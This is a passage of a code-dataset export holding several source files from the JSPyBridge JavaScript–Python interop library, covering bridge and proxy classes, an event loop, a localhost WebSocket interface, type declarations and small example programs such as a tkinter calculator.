"UTF-8", "text": "const util = require('util')\nconst { JSBridge } = require('./jsi')\nconst errors = require('./errors')\nconst log = process.env.DEBUG ? console.debug : () => {}\n// const log = console.log\nconst REQ_TIMEOUT = 100000\n\nclass BridgeException extends Error {\n constructor (...a) {\n super(...a)\n this.message += ` Python didn't respond in time (${REQ_TIMEOUT}ms), look above for any Python errors. If no errors, the API call hung.`\n // We'll fix the stack trace once this is shipped.\n }\n}\n\nclass PythonException extends Error {\n constructor (stack, error) {\n super()\n const trace = this.stack.split('\\n').slice(1).join('\\n')\n this.stack = errors.getErrorMessage(stack.join('.'), trace, error)\n }\n}\n\nclass PyClass {\n // Hard privates to avoid tripping over our internal things\n #current = {}\n #userInit\n #superclass\n #superargs\n #superkwargs\n #trap\n constructor (superclass, superArgs = [], superKwargs = {}) {\n if (this.init) this.#userInit = this.init\n this.init = this.#init\n this.#superclass = superclass\n this.#superargs = superArgs\n this.#superkwargs = superKwargs\n if (!Array.isArray(superArgs)) {\n throw new SyntaxError('Second parameter to PyClass super must be the positional arguments to pass to the Python superclass')\n }\n if (typeof superKwargs !== 'object') {\n throw new SyntaxError('Third parameter to PyClass super must be an object which holds keyword arguments to pass to the Python superclass')\n }\n }\n\n static init (...args) {\n const clas = new this(...args)\n return clas.init()\n }\n\n async #init (bridge = globalThis.__pythonBridge) {\n if (this.#trap) throw 'cannot re-init'\n const name = this.constructor.name\n const variables = Object.getOwnPropertyNames(this)\n // Set.has() is faster than Array.includes which is O(n)\n const members = new Set(Object.getOwnPropertyNames(Object.getPrototypeOf(this)).filter(k => k !== 'constructor'))\n // This would be a proxy to Python ... it creates the class & calls __init__ in one pass\n const sup = await this.#superclass\n const [ffid, pyClass] = await bridge.makePyClass(this, name, {\n name,\n overriden: [...variables, ...members],\n bases: this.#superclass ? [[sup.ffid, this.#superargs, this.#superkwargs]] : []\n })\n this.pyffid = ffid\n\n const makeProxy = (target, forceParent) => {\n return new Proxy(target, {\n get: (target, prop) => {\n const pname = prop !== 'then' ? '~~' + prop : prop\n if (forceParent) return pyClass[pname]\n if (prop === 'ffid') return this.pyffid\n if (prop === 'toJSON') return () => ({ ffid })\n if (prop === 'parent') return target.parent\n if (members.has(prop)) return this[prop]\n else return pyClass[pname]\n },\n set: (target, prop, val) => {\n const pname = prop\n if (prop === 'parent') throw RangeError('illegal reserved property change')\n if (forceParent) return pyClass[pname] = val\n if (members.has(prop)) return this[prop] = val\n else return pyClass[pname] = val\n },\n apply: (target, self, args) => {\n const prop = '__call__'\n if (this[prop]) {\n return this[prop](...args)\n } else {\n return pyClass[prop](...args)\n }\n }\n })\n }\n class Trap extends Function {\n constructor () {\n super()\n this.base = makeProxy(this, false)\n this.parent = makeProxy(this, true)\n }\n }\n this.#trap = new Trap()\n\n for (const member of members) {\n const fn = this[member]\n this.#current[member] = fn\n // Overwrite the `this` statement in each of the class members to use our router\n this[member] = fn.bind(this.#trap.base)\n }\n\n await this.#userInit?.call(this.#trap.base)\n return this.#trap.base\n }\n}\n\nasync function waitFor (cb, withTimeout, onTimeout) {\n let t\n if (withTimeout === Infinity) return new Promise(resolve => cb(resolve))\n const ret = await Promise.race([\n new Promise(resolve => cb(resolve)),\n new Promise(resolve => { t = setTimeout(() => resolve('timeout'), withTimeout) })\n ])\n clearTimeout(t)\n if (ret === 'timeout') onTimeout()\n return ret\n}\n\nlet nextReqId = 10000\nconst nextReq = () => nextReqId++\n\nclass Bridge {\n constructor (com) {\n this.com = com\n // This is a ref map used so Python can call back JS APIs\n this.jrefs = {}\n\n // We don't want to GC things individually, so batch all the GCs at once\n // to Python\n this.freeable = []\n this.loop = setInterval(this.runTasks, 1000)\n\n // This is called on GC\n this.finalizer = new FinalizationRegistry(ffid => {\n this.freeable.push(ffid)\n // Once the Proxy is freed, we also want to release the pyClass ref\n try { delete this.jsi.m[ffid] } catch {}\n })\n\n this.jsi = new JSBridge(null, this)\n this.jsi.ipc = {\n send: async req => {\n this.com.write(req)\n },\n makePyObject: ffid => this.makePyObject(ffid)\n }\n this.com.register('jsi', this.jsi.onMessage.bind(this.jsi))\n }\n\n runTasks = () => {\n if (this.freeable.length) this.free(this.freeable)\n this.freeable = []\n }\n\n end () {\n clearInterval(this.loop)\n }\n\n request (req, cb) {\n // When we call Python functions with Proxy paramaters, we need to just send the FFID\n // so it can be mapped on the python side.\n this.com.write(req, cb)\n }\n\n async len (ffid, stack) {\n const req = { r: nextReq(), action: 'length', ffid: ffid, key: stack, val: '' }\n const resp = await waitFor(cb => this.request(req, cb), REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') throw new PythonException(stack, resp.sig)\n return resp.val\n }\n\n async get (ffid, stack, args, suppressErrors) {\n const req = { r: nextReq(), action: 'get', ffid: ffid, key: stack, val: args }\n\n const resp = await waitFor(cb => this.request(req, cb), REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') {\n if (suppressErrors) return undefined\n throw new PythonException(stack, resp.sig)\n }\n switch (resp.key) {\n case 'string':\n case 'int':\n return resp.val // Primitives don't need wrapping\n default: {\n const py = this.makePyObject(resp.val, resp.sig)\n this.queueForCollection(resp.val, py)\n return py\n }\n }\n }\n\n async call (ffid, stack, args, kwargs, set, timeout) {\n const made = {}\n const r = nextReq()\n const req = { r, action: set ? 'setval' : 'pcall', ffid: ffid, key: stack, val: [args, kwargs] }\n // The following serializes our arguments and sends them to Python.\n // When we provide FFID as '', we ask Python to assign a new FFID on\n // its side for the purpose of this function call, then to return\n // the number back to us\n const payload = JSON.stringify(req, (k, v) => {\n if (!k) return v\n if (v && !v.r) {\n if (v instanceof PyClass) {\n const r = nextReq()\n made[r] = v\n return { r, ffid: '', extend: v.pyffid }\n }\n if (v.ffid) return { ffid: v.ffid }\n if (\n typeof v === 'function' ||\n (typeof v === 'object' && (v.constructor.name !== 'Object' && v.constructor.name !== 'Array'))\n ) {\n const r = nextReq()\n made[r] = v\n return { r, ffid: '' }\n }\n }\n return v\n })\n\n const resp = await waitFor(resolve => this.com.writeRaw(payload, r, pre => {\n if (pre.key === 'pre') {\n for (const r in pre.val) {\n const ffid = pre.val[r]\n // Python is the owner of the memory, we borrow a ref to it and once\n // we're done with it (GC'd), we can ask python to free it\n if (made[r] instanceof Promise) throw Error('You did not await a paramater when calling ' + stack.join('.'))\n this.jsi.m[ffid] = made[r]\n this.queueForCollection(ffid, made[r])\n }\n return true\n } else {\n resolve(pre)\n }\n }), timeout || REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') throw new PythonException(stack, resp.sig)\n\n if (set) {\n return true // Do not allocate new FFID if setting\n }\n\n log('call', ffid, stack, args, resp)\n switch (resp.key) {\n case 'string':\n case 'int':\n return resp.val // Primitives don't need wrapping\n default: {\n const py = this.makePyObject(resp.val, resp.sig)\n this.queueForCollection(resp.val, py)\n return py\n }\n }\n }\n\n async value (ffid, stack) {\n const req = { r: nextReq(), action: 'value', ffid: ffid, key: stack, val: '' }\n const resp = await waitFor(cb => this.request(req, cb), REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') throw new PythonException(stack, resp.sig)\n return resp.val\n }\n\n async inspect (ffid, stack) {\n const req = { r: nextReq(), action: 'inspect', ffid: ffid, key: stack, val: '' }\n const resp = await waitFor(cb => this.request(req, cb), REQ_TIMEOUT, () => {\n throw new BridgeException(`Attempt to access '${stack.join('.')}' failed.`)\n })\n if (resp.key === 'error') throw new PythonException(stack, resp.sig)\n return resp.val\n }\n\n async free (ffids) {\n const req = { r: nextReq(), action: 'free', ffid: '', key: '', val: ffids }\n this.request(req)\n return true\n }\n\n queueForCollection (ffid, val) {\n this.finalizer.register(val, ffid)\n }\n\n /**\n * This method creates a Python class which proxies overriden entries on the\n * on the JS side over to JS. Conversely, in JS when a property access\n * is performed on an object that doesn't exist, it's sent to Python.\n */\n async makePyClass (inst, name, props) {\n const req = { r: nextReq(), action: 'makeclass', ffid: '', key: name, val: props }\n const resp = await waitFor(cb => this.request(req, cb), 500, () => {\n throw new BridgeException(`Attempt to create '${name}' failed.`)\n })\n if (resp.key === 'error') throw new PythonException([name], resp.sig)\n // Python puts a new proxy into its Ref map, we get a ref ID to its one.\n // We don't put ours into our map; allow normal GC on our side and once\n // it is, it'll be free'd in the Python side.\n this.jsi.addWeakRef(inst, resp.val[0])\n // Track when our class gets GC'ed so we can erase it on the Python side\n this.queueForCollection(resp.val[0], inst)\n // Return the Python instance - when it gets freed, the\n // other ref on the python side is also free'd.\n return [resp.val[1], this.makePyObject(resp.val[1], resp.sig)]\n }\n\n makePyObject (ffid, inspectString) {\n const self = this\n // \"Intermediate\" objects are returned while chaining. If the user tries to log\n // an Intermediate then we know they forgot to use await, as if they were to use\n // await, then() would be implicitly called where we wouldn't return a Proxy, but\n // a Promise. Must extend Function to be a \"callable\" object in JS for the Proxy.\n class Intermediate extends Function {\n constructor (callstack) {\n super()\n this.callstack = [...callstack]\n }\n\n [util.inspect.custom] () {\n return '\\n[You must use await when calling a Python API]\\n'\n }\n }\n const handler = {\n get: (target, prop, reciever) => {\n const next = new Intermediate(target.callstack)\n // log('`prop', next.callstack, prop)\n if (prop === '$$') return target\n if (prop === 'ffid') return ffid\n if (prop === 'toJSON') return () => ({ ffid })\n if (prop === 'toString' && inspectString) return target[prop]\n if (prop === 'then') {\n // Avoid .then loops\n if (!next.callstack.length) {\n return undefined\n }\n return (resolve, reject) => {\n const suppressErrors = next.callstack[next.callstack.length - 1].endsWith?.('$')\n if (suppressErrors) {\n next.callstack.push(next.callstack.pop().replace('$', ''))\n }\n this.get(ffid, next.callstack, [], suppressErrors).then(resolve).catch(reject)\n next.callstack = [] // Empty the callstack afer running fn\n }\n }\n if (prop === 'length') return this.len(ffid, next.callstack, [])\n if (typeof prop === 'symbol') {\n if (prop === Symbol.iterator) {\n // This is just for destructuring arrays\n return function *iter () {\n for (let i = 0; i < 100; i++) {\n const next = new Intermediate([...target.callstack, i])\n yield new Proxy(next, handler)\n }\n throw SyntaxError('You must use `for await` when iterating over a Python object in a for-of loop')\n }\n }\n if (prop === Symbol.asyncIterator) {\n return async function *iter () {\n const it = await self.call(0, ['Iterate'], [{ ffid }])\n while (true) {\n const val = await it.Next()\n if (val === '$$STOPITER') {\n return\n } else {\n yield val\n }\n }\n }\n }\n log('Get symbol', next.callstack, prop)\n return\n }\n if (Number.isInteger(parseInt(prop))) prop = parseInt(prop)\n next.callstack.push(prop)\n return new Proxy(next, handler) // no $ and not fn call, continue chaining\n },\n apply: (target, self, args) => { // Called for function call\n const final = target.callstack[target.callstack.length - 1]\n let kwargs, timeout\n if (final === 'apply') {\n target.callstack.pop()\n args = [args[0], ...args[1]]\n } else if (final === 'call') {\n target.callstack.pop()\n } else if (final?.endsWith('$')) {\n kwargs = args.pop()\n timeout = kwargs.$timeout\n delete kwargs.$timeout\n target.callstack[target.callstack.length - 1] = final.slice(0, -1)\n } else if (final === 'valueOf') {\n target.callstack.pop()\n const ret = this.value(ffid, [...target.callstack])\n return ret\n } else if (final === 'toString') {\n target.callstack.pop()\n const ret = this.inspect(ffid, [...target.callstack])\n return ret\n }\n const ret = this.call(ffid, target.callstack, args, kwargs, false, timeout)\n target.callstack = [] // Flush callstack to py\n return ret\n },\n set: (target, prop, val) => {\n if (Number.isInteger(parseInt(prop))) prop = parseInt(prop)\n const ret = this.call(ffid, [...target.callstack], [prop, val], {}, true)\n return ret\n }\n }\n // A CustomLogger is just here to allow the user to console.log Python objects\n // since this must be sync, we need to call inspect in Python along with every CALL or GET\n // operation, which does bring some small overhead.\n class CustomLogger extends Function {\n constructor () {\n super()\n this.callstack = []\n }\n\n [util.inspect.custom] () {\n return inspectString || \"(Some Python object) Use `await object.toString()` to get this object's repr().\"\n }\n\n toString () {\n return inspectString || '(Some Python object)'\n }\n }\n return new Proxy(new CustomLogger(), handler)\n }\n}\n\nmodule.exports = { PyClass, Bridge }\n" }, { "alpha_fraction": 0.5593952536582947, "alphanum_fraction": 0.5788336992263794, "avg_line_length": 24.72222137451172, "blob_id": "96713a94fa42cb993015f7b2fc74f9117bf6fe3c", "content_id": "8938505d95a3136caaf56233e3d12756c5e9b778", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1389, "license_type": "permissive", "max_line_length": 97, "num_lines": 54, "path": "/examples/javascript/calculator.js", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import { python } from 'pythonia'\nconst tk = await python('tkinter')\n\nlet expression = ''\nlet equation\n\nasync function press (num) {\n if (num === '=') {\n try {\n console.info('Evaluating:', expression)\n const total = eval(expression)\n await equation.set(total)\n } catch (e) {\n await equation.set(' error ')\n expression = ''\n }\n } else if (num === 'Clear') {\n expression = ''\n await equation.set('')\n } else {\n expression += num\n await equation.set(expression)\n }\n}\n\nasync function main () {\n const gui = await tk.Tk()\n await gui.configure({ background: 'light green' })\n await gui.title('Simple Calculator')\n await gui.geometry('270x150')\n equation = await tk.StringVar()\n const expression_field = await tk.Entry$(gui, { textvariable: equation })\n await expression_field.grid$({ columnspan: 4, ipadx: 70 })\n\n const buttons = [1, 2, 3, null, 4, 5, 6, null, 7, 8, 9, null, 0, '+', '-', null, '*', '/', '=']\n let row = 1\n let col = 0\n for (const button of buttons) {\n if (button == null) { row += 2; col = 0; continue }\n const button1 = await tk.Button$(gui, {\n text: ` ${button} `,\n fg: 'black',\n bg: 'red',\n command: () => press(button),\n height: 1,\n width: 7\n })\n await button1.grid({ row, column: col++ })\n }\n\n await gui.mainloop$({ $timeout: Infinity })\n}\nawait main()\npython.exit()\n" }, { "alpha_fraction": 0.6605977416038513, "alphanum_fraction": 0.6626588702201843, "avg_line_length": 32.86046600341797, "blob_id": "6f5d8ed380b898b8b87bf09e533b8e3b0f619629", "content_id": "9465fd5574182a1aa1182cf87d252e93893e28ef", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": true, "language": "TypeScript", "length_bytes": 2911, "license_type": "permissive", "max_line_length": 122, "num_lines": 86, "path": "/src/pythonia/index.d.ts", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "/// <reference path=\"./py.stdlib.d.ts\" />\n\nexport function python<T extends PyTypeName>(type: T) : Promise<PyObjectType<T>>\n// Template function to evaulate Python code \nexport function py(tokens, ...replacements)\n\ninterface py {\n // Template function to exec() Python code\n exec(tokens, ...replacements): Promise<any>\n\n /**\n * Creates a Python Set, `set(1, 2, 3)`. Most APIs accept normal arrays, but some require set/tuple types.\n * @param items Items to include in this set\n */\n set(...items): Promise<any>\n \n /**\n * Creates a Python tuple, `tuple(1, 2, 3)`. Most APIs accept normal arrays, but some require set/tuple types.\n * @param items Items to include in this tuple\n */\n tuple(...items): Promise<any>\n\n /**\n * Same as Python's enumerate(). Used for for loops. For example,\n * ```js\n * for await (const entry of await py.enumerate(some_iter)) {\n * console.log(entry)\n * }\n * ```\n * @param item The Python object\n */\n enumerate(item): Promise<any>\n\n /**\n * The Python with statement, the first parameter is the Python object\n * and the second is the function, which takes a `handle` parameter. For example,\n * ```js\n * await py.with(open('someFile'), async (f) => {\n * await f.write('Hello world!')\n * })\n * ```\n */\n with(statement: PyObjectType<any>, callback: (handle: any) => Promise<void>): Promise<void>\n}\n\ninterface python {\n /**\n * This toggles \"Fast Mode\", where the bridge skips string serialization. With this enabled, when using console.log\n * you now need to await object.toString(). For example, \n * ```js\n * const res = await somePythonApi(); \n * console.log(await res.toString())\n * ```\n * @param value True or false\n */\n setFastMode(value: boolean): void\n\n\n /**\n * Change the Python process working dir. Allows for file system loads relative to the working dir.\n * @param path The path to set the work dir to. If blank, pick the current file's folder path.\n */\n cwd(path): void\n\n /**\n * Quits the Python process. You can also do `process.exit()` if you want to kill the current process, including Python.\n */\n exit(): void\n}\n\nexport class PyClass {\n /**\n * Creates a Python class. **You must use** `await MyClass.init()` when initializing, don't just do `new MyClass()`.\n * The JS constructor is called *before* the Python class has been `__init__`'ed. Your `init()` method is called\n * after the Python class has been constructed. \n * @param superclass The Python superclass you want to extend, optional. \n * @param superArguments The positional arguments you want to pass to the super `__init__`\n * @param superKeywordArguments The keyword arguments you want to pass to the super `__init__`\n */\n constructor(superclass: PyObjectType<any>, superArguments: [], superKeywordArguments: {})\n\n /**\n * This class is called after the Python class has been created.\n */\n init()\n}" }, { "alpha_fraction": 0.6958174705505371, "alphanum_fraction": 0.73384028673172, "avg_line_length": 23, "blob_id": "da46b88eccb141021de08b16e1fcaab9518d2036", "content_id": "af2943fa77fb2c61219eaa0ecd595a29b530dd11", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 263, "license_type": "permissive", "max_line_length": 52, "num_lines": 11, "path": "/examples/python/webserver.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import time\nfrom javascript import require\nhttp = require('http')\n\ndef handler(this, req, res):\n res.writeHead(200, {'Content-Type': 'text/plain'})\n res.end('Hello World!')\n\nhttp.createServer(handler).listen(8080)\n# Keep the Python process alive\ntime.sleep(100)" }, { "alpha_fraction": 0.5796515345573425, "alphanum_fraction": 0.5836963057518005, "avg_line_length": 34.12568283081055, "blob_id": "78481ea2924d0681647a9436aef2d81b76ab5dfe", "content_id": "58260c0e519c48c7ecf1f128903a7657cb99ff79", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6428, "license_type": "permissive", "max_line_length": 106, "num_lines": 183, "path": "/src/javascript/events.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import time, threading, json, sys\nfrom . import connection, config, pyi\nfrom queue import Queue\nfrom weakref import WeakValueDictionary\n\n\nclass TaskState:\n def __init__(self):\n self.stopping = False\n self.sleep = self.wait\n\n def wait(self, sec):\n stopTime = time.time() + sec\n while time.time() < stopTime and not self.stopping:\n time.sleep(0.2)\n if self.stopping:\n sys.exit(1)\n\n\nclass EventExecutorThread(threading.Thread):\n running = True\n jobs = Queue()\n doing = []\n\n def __init__(self):\n super().__init__()\n self.setDaemon(True)\n\n def add_job(self, request_id, cb_id, job, args):\n if request_id in self.doing:\n return # We already are doing this\n self.doing.append(request_id)\n self.jobs.put([request_id, cb_id, job, args])\n\n def run(self):\n while self.running:\n request_id, cb_id, job, args = self.jobs.get()\n ok = job(args)\n if self.jobs.empty():\n self.doing = []\n\n\n# The event loop here is shared across all threads. All of the IO between the\n# JS and Python happens through this event loop. Because of Python's \"Global Interperter Lock\"\n# only one thread can run Python at a time, so no race conditions to worry about.\nclass EventLoop:\n active = True\n queue = Queue()\n freeable = []\n\n callbackExecutor = EventExecutorThread()\n\n # This contains a map of active callbacks that we're tracking.\n # As it's a WeakRef dict, we can add stuff here without blocking GC.\n # Once this list is empty (and a CB has been GC'ed) we can exit.\n # Looks like someone else had the same idea :)\n # https://stackoverflow.com/questions/21826700/using-python-weakset-to-enable-a-callback-functionality\n callbacks = WeakValueDictionary()\n\n # The threads created managed by this event loop.\n threads = []\n\n outbound = []\n\n # After a socket request is made, it's ID is pushed to self.requests. Then, after a response\n # is recieved it's removed from requests and put into responses, where it should be deleted\n # by the consumer.\n requests = {} # Map of requestID -> threading.Lock\n responses = {} # Map of requestID -> response payload\n\n def __init__(self):\n connection.start()\n self.callbackExecutor.start()\n self.pyi = pyi.PyInterface(self, config.executor)\n\n def stop(self):\n connection.stop()\n\n # === THREADING ===\n def newTaskThread(self, handler, *args):\n state = TaskState()\n t = threading.Thread(target=handler, args=(state, *args), daemon=True)\n self.threads.append([state, handler, t])\n return t\n\n def startThread(self, method):\n for state, handler, thread in self.threads:\n if method == handler:\n thread.start()\n return\n self.newTaskThread(method)\n t.start()\n\n # Signal to the thread that it should stop. No forcing.\n def stopThread(self, method):\n for state, handler, thread in self.threads:\n if method == handler:\n state.stopping = True\n\n # Force the thread to stop -- if it doesn't kill after a set amount of time.\n def abortThread(self, method, killAfter=0.5):\n for state, handler, thread in self.threads:\n if handler == method:\n state.stopping = True\n killTime = time.time() + killAfter\n while thread.is_alive():\n time.sleep(0.2)\n if time.time() < killTime:\n thread.terminate()\n\n self.threads = [x for x in self.threads if x[1] != method]\n\n # Stop the thread immediately\n def terminateThread(self, method):\n for state, handler, thread in self.threads:\n if handler == method:\n thread.terminate()\n self.threads = [x for x in self.threads if x[1] != method]\n\n # == IO ==\n\n # `queue_request` pushes this event onto the Payload\n def queue_request(self, request_id, payload, timeout=None):\n self.outbound.append(payload)\n lock = threading.Event()\n self.requests[request_id] = [lock, timeout]\n self.queue.put(\"send\")\n return lock\n\n def queue_payload(self, payload):\n self.outbound.append(payload)\n self.queue.put(\"send\")\n\n def await_response(self, request_id, timeout=None):\n lock = threading.Event()\n self.requests[request_id] = [lock, timeout]\n self.queue.put(\"send\")\n return lock\n\n def on_exit(self):\n if len(self.callbacks):\n config.debug(\"cannot exit because active callback\", self.callbacks)\n while len(self.callbacks) and connection.is_alive():\n time.sleep(0.4)\n time.sleep(0.4) # Allow final IO\n self.callbackExecutor.running = False\n self.queue.put(\"exit\")\n\n # === LOOP ===\n def loop(self):\n while self.active:\n # Wait until we have jobs\n self.queue.get(block=True)\n # Empty the jobs & start running stuff !\n self.queue.empty()\n\n # Send the next outbound request batch\n connection.writeAll(self.outbound)\n self.outbound = []\n\n # Iterate over the open threads and check if any have been killed, if so\n # remove them from self.threads\n self.threads = [x for x in self.threads if x[2].is_alive()]\n\n if len(self.freeable) > 40:\n self.queue_payload({\"r\": r, \"action\": \"free\", \"ffid\": \"\", \"args\": self.freeable})\n self.freeable = []\n\n # Read the inbound data and route it to correct handler\n inbounds = connection.readAll()\n for inbound in inbounds:\n r = inbound[\"r\"]\n cbid = inbound[\"cb\"] if \"cb\" in inbound else None\n if \"c\" in inbound and inbound[\"c\"] == \"pyi\":\n j = inbound\n self.callbackExecutor.add_job(r, cbid, self.pyi.inbound, inbound)\n if r in self.requests:\n lock, timeout = self.requests[r]\n barrier = threading.Barrier(2, timeout=5)\n self.responses[r] = inbound, barrier\n del self.requests[r]\n lock.set() # release, allow calling thread to resume\n barrier.wait()\n" }, { "alpha_fraction": 0.5801056623458862, "alphanum_fraction": 0.5823063254356384, "avg_line_length": 24.52808952331543, "blob_id": "f360d5bdb558ec66600bebf3d18db123130b0cd5", "content_id": "8acb01624422439096ab2a06362b8f37b8fef081", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2272, "license_type": "permissive", "max_line_length": 83, "num_lines": 89, "path": "/src/pythonia/ws.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "# WebSocket Interface for Python access\nfrom Bridge import Bridge\nfrom queue import Queue\nimport threading, json\nimport asyncio\nimport websockets\n\nloop = asyncio.get_event_loop()\nsendQ = asyncio.Queue()\n\n\nclass WsCom:\n recvQ = Queue()\n sendQ = Queue()\n socket = None\n\n def readline(self):\n return self.recvQ.get()\n\n # Submit a job to asyncio to send since we're in another thread\n def queue(self, what):\n if type(what) == str:\n w = what\n else:\n w = json.dumps(what)\n asyncio.run_coroutine_threadsafe(sendQ.put(w), loop)\n\n # asyncio wants to put a message into our read queue\n def put(self, what):\n self.recvQ.put(what)\n\n\nipc = WsCom()\nbridge = Bridge(ipc)\n\n\ndef ws_io():\n global ipc\n\n async def consumer_handler(websocket, path):\n async for message in websocket:\n print(\"<-\", message)\n ipc.recvQ.put(message)\n\n async def producer_handler(websocket, path):\n return True\n while True:\n message = await ipc.sendQ.get()\n # print(\"SENDING\", message)\n await websocket.send(message)\n await asyncio.sleep(1)\n\n async def handler(ws, path):\n print(\"new conn!\")\n while True:\n listener_task = asyncio.ensure_future(ws.recv())\n producer_task = asyncio.ensure_future(sendQ.get())\n\n done, pending = await asyncio.wait(\n [listener_task, producer_task], return_when=asyncio.FIRST_COMPLETED\n )\n for task in pending:\n task.cancel()\n\n if listener_task in done:\n message = listener_task.result()\n ipc.put(message)\n\n if producer_task in done:\n message = producer_task.result()\n await ws.send(message)\n\n start_server = websockets.serve(handler, \"localhost\", 8768)\n loop.run_until_complete(start_server)\n loop.run_forever()\n\n\ndef com_io():\n while True:\n data = ipc.readline()\n if not data:\n break\n j = json.loads(data)\n bridge.onMessage(j[\"r\"], j[\"action\"], j[\"ffid\"], j[\"key\"], j[\"val\"])\n\n\ncom_thread = threading.Thread(target=com_io, args=(), daemon=True)\ncom_thread.start()\nws_io()\n" }, { "alpha_fraction": 0.5356627106666565, "alphanum_fraction": 0.538552463054657, "avg_line_length": 32.68584060668945, "blob_id": "24fbc498d3372539d3890b00bd5381c66f03a66a", "content_id": "95bcc44b149ccf641721daa35fa1a17eb3ce4bb5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7613, "license_type": "permissive", "max_line_length": 100, "num_lines": 226, "path": "/src/pythonia/proxy.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import time, threading, json\nimport json_patch\n\ndebug = lambda *a: a\n# debug = print\n\n\nclass JavaScriptError(Exception):\n pass\n\n\n# This is the Executor, something that sits in the middle of the Bridge and is the interface for\n# Python to JavaScript. This is also used by the bridge to call Python from Node.js.\nclass Executor:\n def __init__(self, loop):\n self.loop = loop\n self.queue = loop.queue_request\n self.i = 0\n\n def ipc(self, action, ffid, attr, args=None):\n self.i += 1\n r = self.i # unique request ts, acts as ID for response\n l = None # the lock\n if action == \"get\": # return obj[prop]\n l = self.queue(r, {\"r\": r, \"action\": \"get\", \"ffid\": ffid, \"key\": attr})\n if action == \"init\": # return new obj[prop]\n l = self.queue(r, {\"r\": r, \"action\": \"init\", \"ffid\": ffid, \"key\": attr, \"args\": args})\n if action == \"inspect\": # return require('util').inspect(obj[prop])\n l = self.queue(r, {\"r\": r, \"action\": \"inspect\", \"ffid\": ffid, \"key\": attr})\n if action == \"serialize\": # return JSON.stringify(obj[prop])\n l = self.queue(r, {\"r\": r, \"action\": \"serialize\", \"ffid\": ffid})\n if action == \"keys\":\n l = self.queue(r, {\"r\": r, \"action\": \"keys\", \"ffid\": ffid})\n if action == \"raw\":\n # (not really a FFID, but request ID)\n r = ffid\n l = self.loop.queue_request_raw(ffid, args)\n\n # Listen for a response\n while True:\n j = self.loop.read()\n if j[\"r\"] == r: # if this is a message for us, OK, return to Python calle\n break\n else: # The JS API we called wants to call a Python API... so let the loop handle it.\n self.loop.onMessage(j[\"r\"], j[\"action\"], j[\"ffid\"], j[\"key\"], j[\"val\"])\n if \"error\" in j:\n raise JavaScriptError(f\"Access to '{attr}' failed:\\n{j['error']}\\n\")\n return j\n\n def pcall(self, ffid, action, attr, args, timeout=10):\n \"\"\"\n This function does a one-pass call to JavaScript. Since we assign the FFIDs, we do not\n need to send any preliminary call to JS. We can assign them ourselves.\n\n We simply iterate over the arguments, and for each of the non-primitive values, we\n create new FFIDs for them, then use them as a replacement for the non-primitive arg\n objects. We can then send the request to JS and expect one response back.\n \"\"\"\n self.ctr = 0\n self.i += 1\n requestId = self.i\n packet = {\n \"r\": self.i,\n \"c\": \"jsi\",\n \"p\": 1,\n \"action\": action,\n \"ffid\": ffid,\n \"key\": attr,\n \"args\": args,\n }\n\n def ser(arg):\n if hasattr(arg, \"ffid\"):\n return {\"ffid\": arg.ffid}\n else:\n # Anything we don't know how to serialize -- exotic or not -- treat it as an object\n return {\"ffid\": self.new_ffid(arg)}\n\n payload = json.dumps(packet, default=ser)\n\n res = self.ipc(\"raw\", requestId, attr, payload)\n\n return res[\"key\"], res[\"val\"]\n\n def getProp(self, ffid, method):\n resp = self.ipc(\"get\", ffid, method)\n return resp[\"key\"], resp[\"val\"]\n\n def setProp(self, ffid, method, val):\n self.pcall(ffid, \"set\", method, [val])\n return True\n\n def callProp(self, ffid, method, args, timeout=None):\n resp = self.pcall(ffid, \"call\", method, args, timeout)\n return resp\n\n def initProp(self, ffid, method, args):\n resp = self.pcall(ffid, \"init\", method, args)\n return resp\n\n def inspect(self, ffid, mode):\n resp = self.ipc(\"inspect\", ffid, mode)\n return resp[\"val\"]\n\n def keys(self, ffid):\n return self.ipc(\"keys\", ffid, \"\")[\"keys\"]\n\n def free(self, ffid):\n self.i += 1\n try:\n l = self.queue(self.i, {\"r\": self.i, \"action\": \"free\", \"args\": [ffid]})\n except ValueError: # Event loop is dead, no need for GC\n pass\n\n def new_ffid(self, for_object):\n self.loop.cur_ffid += 1\n self.loop.m[self.loop.cur_ffid] = for_object\n return self.loop.cur_ffid\n\n def get(self, ffid):\n return self.loop.m[ffid]\n\n\nINTERNAL_VARS = [\"ffid\", \"_ix\", \"_exe\", \"_pffid\", \"_pname\", \"_es6\", \"~class\", \"_Keys\"]\n\n# \"Proxy\" classes get individually instanciated for every thread and JS object\n# that exists. It interacts with an Executor to communicate.\nclass Proxy(object):\n def __init__(self, exe, ffid, prop_ffid=None, prop_name=\"\", es6=False):\n self.ffid = ffid\n self._exe = exe\n self._ix = 0\n #\n self._pffid = prop_ffid if (prop_ffid != None) else ffid\n self._pname = prop_name\n self._es6 = es6\n self._Keys = None\n\n def _call(self, method, methodType, val):\n this = self\n\n debug(\"MT\", method, methodType, val)\n if methodType == \"fn\":\n return Proxy(self._exe, val, self.ffid, method)\n if methodType == \"class\":\n return Proxy(self._exe, val, es6=True)\n if methodType == \"obj\":\n return Proxy(self._exe, val)\n if methodType == \"inst\":\n return Proxy(self._exe, val)\n if methodType == \"void\":\n return None\n if methodType == \"py\":\n return 